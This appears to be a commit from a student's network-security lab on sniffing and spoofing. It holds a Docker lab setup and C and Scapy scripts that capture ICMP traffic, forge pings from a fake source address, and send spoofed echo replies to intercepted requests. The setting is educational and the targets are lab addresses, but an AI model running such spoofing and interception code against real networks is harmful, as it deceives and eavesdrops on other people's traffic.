first commit

Sniffing_Spoofing/Labsetup/docker-compose.yml

@@ -0,0 +1,49 @@
+#version: "3"
+
+services:
+    attacker:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: seed-attacker
+        tty: true
+        cap_add:
+                - ALL
+        privileged: true
+        volumes:
+                - ./volumes:/volumes
+        network_mode: host
+
+    hostA:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: hostA-10.9.0.5
+        tty: true
+        cap_add:
+                - ALL
+        networks:
+            net-10.9.0.0:
+                ipv4_address: 10.9.0.5
+        command: bash -c "
+                      /etc/init.d/openbsd-inetd start  &&
+                      tail -f /dev/null
+                 "
+
+    hostB:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: hostB-10.9.0.6
+        tty: true
+        cap_add:
+                - ALL
+        networks:
+            net-10.9.0.0:
+                ipv4_address: 10.9.0.6
+        command: bash -c "
+                      /etc/init.d/openbsd-inetd start  &&
+                      tail -f /dev/null
+                 "
+                  
+networks:
+    net-10.9.0.0:
+        name: net-10.9.0.0
+        ipam:
+            config:
+                - subnet: 10.9.0.0/24
+

Sniffing_Spoofing/Labsetup/volumes/sniff_and_spoof.c

@@ -0,0 +1,76 @@
+#include <pcap.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+unsigned short in_cksum (unsigned short *buf, int length) {
+    unsigned short *w = buf;
+    int nleft = length;
+    int sum = 0;
+    unsigned short temp=0;
+    while (nleft > 1)  { sum += *w++; nleft -= 2; }
+    if (nleft == 1) { *(u_char *)(&temp) = *(u_char *)w ; sum += temp; }
+    sum = (sum >> 16) + (sum & 0xffff);
+    sum += (sum >> 16);
+    return (unsigned short)(~sum);
+}
+
+void send_raw_ip_packet(struct iphdr* ip) {
+    struct sockaddr_in dest_info;
+    int enable = 1;
+    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
+    dest_info.sin_family = AF_INET;
+    dest_info.sin_addr.s_addr = ip->daddr;
+    sendto(sock, ip, ntohs(ip->tot_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
+    close(sock);
+}
+
+void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
+    struct iphdr *ip = (struct iphdr *)(packet + 14); // Skip Ethernet header (14 bytes)
+    if (ip->protocol != IPPROTO_ICMP) return;
+
+    struct icmphdr *icmp = (struct icmphdr *)(packet + 14 + (ip->ihl * 4));
+    if (icmp->type == 8) { // Echo request
+        printf("Intercepted ICMP Echo Request from %s to %s\n", inet_ntoa(*(struct in_addr *)&ip->saddr), inet_ntoa(*(struct in_addr *)&ip->daddr));
+
+        char buffer[1500];
+        int ip_header_len = ip->ihl * 4;
+        int icmp_len = ntohs(ip->tot_len) - ip_header_len;
+        memcpy(buffer, ip, ntohs(ip->tot_len));
+
+        struct iphdr *new_ip = (struct iphdr *)buffer;
+        struct icmphdr *new_icmp = (struct icmphdr *)(buffer + ip_header_len);
+
+        // Swap addresses
+        new_ip->saddr = ip->daddr;
+        new_ip->daddr = ip->saddr;
+        new_ip->ttl = 64;
+
+        // Change to Echo Reply
+        new_icmp->type = 0;
+        new_icmp->checksum = 0;
+        new_icmp->checksum = in_cksum((unsigned short *)new_icmp, icmp_len);
+
+        printf("Sending spoofed ICMP Echo Reply from %s back to %s...\n", inet_ntoa(*(struct in_addr *)&new_ip->saddr), inet_ntoa(*(struct in_addr *)&new_ip->daddr));
+        send_raw_ip_packet(new_ip);
+    }
+}
+
+int main() {
+    pcap_t *handle;
+    char errbuf[PCAP_ERRBUF_SIZE];
+    struct bpf_program fp;
+    char filter_exp[] = "icmp";
+    handle = pcap_open_live("br-c031fbf1a197", BUFSIZ, 1, 1000, errbuf);
+    pcap_compile(handle, &fp, filter_exp, 0, PCAP_NETMASK_UNKNOWN);
+    pcap_setfilter(handle, &fp);
+    printf("C-based Sniff-and-Spoof active...\n");
+    pcap_loop(handle, -1, got_packet, NULL);
+    pcap_close(handle);
+    return 0;
+}

Sniffing_Spoofing/Labsetup/volumes/sniff_and_spoof.py

@@ -0,0 +1,22 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def spoof_reply(pkt):
+    # Only respond to ICMP Echo Requests
+    if ICMP in pkt and pkt[ICMP].type == 8:
+        print(f"Intercepted ICMP Echo Request from {pkt[IP].src} to {pkt[IP].dst}")
+        
+        # Build spoofed ICMP Echo Reply
+        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
+        icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
+        
+        # Add payload if present
+        payload = pkt[Raw].load if Raw in pkt else b""
+        
+        new_pkt = ip/icmp/payload
+        print(f"Sending spoofed reply from {pkt[IP].dst} to {pkt[IP].src}...")
+        send(new_pkt, verbose=0)
+
+print("Sniff-and-Spoof active on br-c031fbf1a197...")
+# Filter: icmp echo-request
+sniff(iface='br-c031fbf1a197', filter='icmp and icmp[icmptype]=8', prn=spoof_reply)

Sniffing_Spoofing/Labsetup/volumes/sniffer.c

@@ -0,0 +1,39 @@
+#include <pcap.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
+    printf("Got a packet\n");
+}
+
+int main() {
+    pcap_t *handle;
+    char errbuf[PCAP_ERRBUF_SIZE];
+    struct bpf_program fp;
+    char filter_exp[] = "icmp";
+    bpf_u_int32 net;
+
+    // Step 1: Open pcap session on the interface
+    handle = pcap_open_live("br-c031fbf1a197", BUFSIZ, 1, 1000, errbuf);
+    if (handle == NULL) {
+        fprintf(stderr, "Couldn't open device: %s\n", errbuf);
+        return 2;
+    }
+
+    // Step 2: Compile filter_exp into BPF code
+    if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
+        fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
+        return 2;
+    }
+    if (pcap_setfilter(handle, &fp) == -1) {
+        fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
+        return 2;
+    }
+
+    // Step 3: Capture packets
+    printf("Sniffing ICMP packets using C and libpcap...\n");
+    pcap_loop(handle, -1, got_packet, NULL);
+
+    pcap_close(handle);
+    return 0;
+}

Sniffing_Spoofing/Labsetup/volumes/sniffer.py

@@ -0,0 +1,8 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def print_pkt(pkt):
+    pkt.show()
+
+print("Sniffing ICMP packets from spoofed IP 1.2.3.4...")
+pkt = sniff(iface='br-c031fbf1a197', filter='icmp and src host 1.2.3.4', prn=print_pkt, count=1)

Sniffing_Spoofing/Labsetup/volumes/spoofer.c

@@ -0,0 +1,81 @@
+#include <stdio.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+/* Checksum calculation function */
+unsigned short in_cksum (unsigned short *buf, int length) {
+    unsigned short *w = buf;
+    int nleft = length;
+    int sum = 0;
+    unsigned short temp=0;
+
+    while (nleft > 1)  {
+        sum += *w++;
+        nleft -= 2;
+    }
+
+    if (nleft == 1) {
+        *(u_char *)(&temp) = *(u_char *)w ;
+        sum += temp;
+    }
+
+    sum = (sum >> 16) + (sum & 0xffff);
+    sum += (sum >> 16);
+    return (unsigned short)(~sum);
+}
+
+void send_raw_ip_packet(struct iphdr* ip) {
+    struct sockaddr_in dest_info;
+    int enable = 1;
+
+    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    if (sock < 0) {
+        perror("Socket creation failed");
+        return;
+    }
+
+    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
+
+    dest_info.sin_family = AF_INET;
+    dest_info.sin_addr.s_addr = ip->daddr;
+
+    if (sendto(sock, ip, ntohs(ip->tot_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info)) < 0) {
+        perror("Sendto failed");
+    } else {
+        printf("Spoofed ICMP packet sent.\n");
+    }
+    close(sock);
+}
+
+int main() {
+    char buffer[1500];
+    memset(buffer, 0, 1500);
+
+    struct iphdr *ip = (struct iphdr *) buffer;
+    struct icmphdr *icmp = (struct icmphdr *) (buffer + sizeof(struct iphdr));
+
+    // Construct ICMP Header
+    icmp->type = ICMP_ECHO;
+    icmp->code = 0;
+    icmp->un.echo.id = htons(1234);
+    icmp->un.echo.sequence = htons(1);
+    icmp->checksum = 0;
+    icmp->checksum = in_cksum((unsigned short *)icmp, sizeof(struct icmphdr));
+
+    // Construct IP Header
+    ip->version = 4;
+    ip->ihl = 5;
+    ip->ttl = 64;
+    ip->saddr = inet_addr("1.2.3.4");
+    ip->daddr = inet_addr("10.9.0.5");
+    ip->protocol = IPPROTO_ICMP;
+    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr));
+
+    send_raw_ip_packet(ip);
+
+    return 0;
+}

Sniffing_Spoofing/Labsetup/volumes/spoofer.py

@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+print("Spoofing ICMP echo request from 1.2.3.4 to 10.9.0.5...")
+a = IP()
+a.src = '1.2.3.4'
+a.dst = '10.9.0.5'
+b = ICMP()
+p = a/b
+send(p)

Sniffing_Spoofing/Labsetup/volumes/traceroute.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+target = "8.8.8.8"
+print(f"Traceroute to {target}...")
+
+for i in range(1, 31):
+    pkt = IP(dst=target, ttl=i) / ICMP()
+    reply = sr1(pkt, verbose=0, timeout=1)
+    
+    if reply is None:
+        print(f"{i}: * * *")
+    elif reply.type == 3: # Destination unreachable
+        print(f"{i}: {reply.src} (Unreachable)")
+        break
+    else:
+        print(f"{i}: {reply.src}")
+        if reply.src == target:
+            print("Reached target!")
+            break